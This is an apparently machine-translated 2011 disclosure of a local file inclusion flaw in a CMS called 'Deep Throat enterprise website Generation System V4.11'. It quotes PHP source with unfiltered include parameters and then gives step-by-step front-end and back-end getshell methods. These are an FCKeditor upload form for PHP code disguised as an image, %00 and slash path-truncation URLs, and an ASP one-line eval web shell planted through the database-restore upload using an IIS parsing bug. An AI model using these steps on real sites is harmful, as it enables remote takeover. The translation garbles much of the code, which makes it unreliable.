Deep Throat enterprise website Generation System V4.11 local vulnerability and repair

# Www.3est.com
# Author: village chief
# Release Date: 2011-04.21

Vulnerability Analysis:

/Index. php source code

/*--------------*/
/* Omit unnecessary Code */
/*--------------*/

$ _ REQUEST = cleanArrayForMysql ($ _ REQUEST );
$ _ GET = cleanArrayForMysql ($ _ GET );
$ _ POST = cleanArrayForMysql ($ _ POST );
$ Request =$ _ REQUEST;

// The above parameters are all escaped by strings, which has no effect on ../

/*--------------*/
/* Omit unnecessary Code */
/*--------------*/

$ Request [m] =! Isset ($ request [m])? : $ Request [m]; // m is not filtered
$ Params [model] = empty ($ request [m])? $ Menu_arr [type]: $ request [m];
$ Request [a] =! Isset ($ request [a])? : $ Request [a]; // a is not filtered
$ Params [action] = empty ($ request [a])? Index: $ request [a];


/*--------------*/
/* Omit unnecessary Code */
/*--------------*/

Function layout_part ($ style =)
{
Global $ params, $ request;

// If this upgrade affects SQL Execution in parts, manually comment out the destorydb function body code and remember not to delete it.
Destorydb ();

If (! Empty ($ style) $ style = _. $ style;
$ Part_path = ABSPATH. /skins /. STYLENAME. /parts /. $ params [model]. _. $ params [action]. $ style .. php; // path containing m and a Parameters
$ Content_part_path = ABSPATH./content/. $ params [model]./parts _. $ params [action].. php; // path containing m and a Parameters
If (is_file ($ part_path ))
Require_once ($ part_path); // contains the vulnerability caused BY: village chief

Elseif (is_file ($ content_part_path ))
Require_once ($ content_part_path); // contains the vulnerability caused BY: village chief
Else
Echo $ part_path;
Echo $ content_part_path;
Echo <span style = "color: RED"> <strong> the Category column or channel of the information you selected may have been deleted or does not exist. Check the column or channel, the topic of the information and the topic is

No! </Strong> </span>;

// If this upgrade affects SQL Execution in parts, manually comment out the following code: recoverdb function body code. Remember not to delete it.
Recoverdb ();

IsComments ();
}
Copy code
Vulnerability exploitation (front-end GETSHELL ):

In IIS or some apache versions, PHP file systems can perform path truncation, for example: /// // or % 00

1. First upload the image format file of PHP malicious code, copy and upload the source code cun.html:

<Form id = "frmUpload" enctype = "multipart/form-data"
Action = "http://www.bkjia.com/editor/editor/filemanager/upload/php/upload.php? Type = Media "method =" post "> Upload a new file: <br>
<Input type = "file" name = "NewFile" size = "50"> <br>
<Input id = "btnUpload" type = "submit" value = "Upload">
</Form>
Copy code
. Assume that the image path/upload/Media/cunzhang.gif is obtained (FCK is used, and the test upload is changed to "." to "_". fck's cannot be directly uploaded to files such as 1.asp;.jpg)

3. directly enter the address:/Article/previusfile/Article/201104/20110422101239144 .gif% 00

Or enter http://www.bkjia.com /? M = ../upload/Me... // (several)

 

Well, let's get a SHELL method in the background. Let's talk to friends who cannot include it and can enter the background.

Background GETSHELL:

Click => database management => database recovery => browse and upload

Upload the file cunzhang. asp;. The SQL content is <% Y = request ("cun") %> <% execute (Y) %>

Get address http://www.bkjia.com/temp/data/cunzhang.asp;. SQL (using IIS parsing vulnerability, is SHELL)